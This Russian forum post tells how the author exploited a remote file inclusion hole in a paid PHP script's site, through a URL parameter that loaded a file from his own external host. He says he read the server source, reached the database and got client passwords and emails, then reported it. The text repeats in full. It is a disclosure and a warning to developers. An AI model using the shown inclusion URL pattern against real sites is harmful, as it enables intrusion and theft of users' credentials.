pauk
Новичок
Простые Шаблоны - опасность хака
Сегодня достал скрипт одного проекта,
за который просили 500 баксов
, и вот как: зашел на официальный сайт.
А люди эти "упростили" себе жизнь,
они создали страницу - заголовок сверху/меню сбоку/счетчики внизу - стандарт.
Ну а текст как всегда в центре.
Так текст они выводили таким способом
www.xxx.com/index.php?text=main
и в контент вставлялся файл main.php
и тд...
И мне пришла в голову идея:
создать на Народе сайт (там РНР не исполняется при вызове)
через ссылку типа
www.xxx.com/index.php?text=http://xxx.narod.ru/myurl
я вызвал файл myurl.php
таким образом я узнал через
show_source() код PHP-файлов на сервере (а еще говорят, такое невозможно) , мало того - я узнал таким способом содержимое базы, получил возможность поменять все,
узнал пароли и е-майлы клиентов
(а соответственно и пароли е-майлов 50% клиентов - не секрет, что у половины везде один пароль).
Все сделал я за 40-50 минут.
Человек, обиженный на проект, так
может сильно навредить и админам и простым клиентам.
Написал я им письмо о дыре, надо скачать через 30 минут вышли в асю,
и попросили не мешать продавать свои скрипты народу, обещают за молчание 1 (Один) доллар США на WebMoney заплатить
Я не указываю страницу проекта, потому как "крутые " хакеры (мама-папа неделю назад книгу типа "РНР для придурков за 20 минут" купили) этим воспользуются, скажу только: таких страниц в сети очень много - людям не следует гнаться за легким
Так что:
1) Не используйте подобные "легкие" шаблоны - дорого может обойтись
2) Будьте внимательны при покупке.
500$ стоил скрипт, а мне он обошелся в 10 рублей (время интернета)
ЗЫ. Призываю не повторять мои действия для нанесения вреда
Люди писали-старались все-таки, хоть и ручки кривые да пальцы кучерявые, но вредить им не рекомендую
Сегодня достал скрипт одного проекта,
за который просили 500 баксов
, и вот как: зашел на официальный сайт.А люди эти "упростили" себе жизнь,
они создали страницу - заголовок сверху/меню сбоку/счетчики внизу - стандарт.
Ну а текст как всегда в центре.
Так текст они выводили таким способом
www.xxx.com/index.php?text=main
и в контент вставлялся файл main.php
и тд...
И мне пришла в голову идея:
создать на Народе сайт (там РНР не исполняется при вызове)
через ссылку типа
www.xxx.com/index.php?text=http://xxx.narod.ru/myurl
я вызвал файл myurl.php
таким образом я узнал через
show_source() код PHP-файлов на сервере (а еще говорят, такое невозможно
) , мало того - я узнал таким способом содержимое базы, получил возможность поменять все,узнал пароли и е-майлы клиентов
(а соответственно и пароли е-майлов 50% клиентов - не секрет, что у половины везде один пароль).
Все сделал я за 40-50 минут.
Человек, обиженный на проект, так
может сильно навредить и админам и простым клиентам.
Написал я им письмо о дыре, надо скачать через 30 минут вышли в асю,
и попросили не мешать продавать свои скрипты народу, обещают за молчание 1 (Один) доллар США на WebMoney заплатить
Я не указываю страницу проекта, потому как "крутые " хакеры (мама-папа неделю назад книгу типа "РНР для придурков за 20 минут" купили) этим воспользуются, скажу только: таких страниц в сети очень много - людям не следует гнаться за легким
Так что:
1) Не используйте подобные "легкие" шаблоны - дорого может обойтись
2) Будьте внимательны при покупке.
500$ стоил скрипт, а мне он обошелся в 10 рублей (время интернета)
ЗЫ. Призываю не повторять мои действия для нанесения вреда
Люди писали-старались все-таки, хоть и ручки кривые да пальцы кучерявые, но вредить им не рекомендую
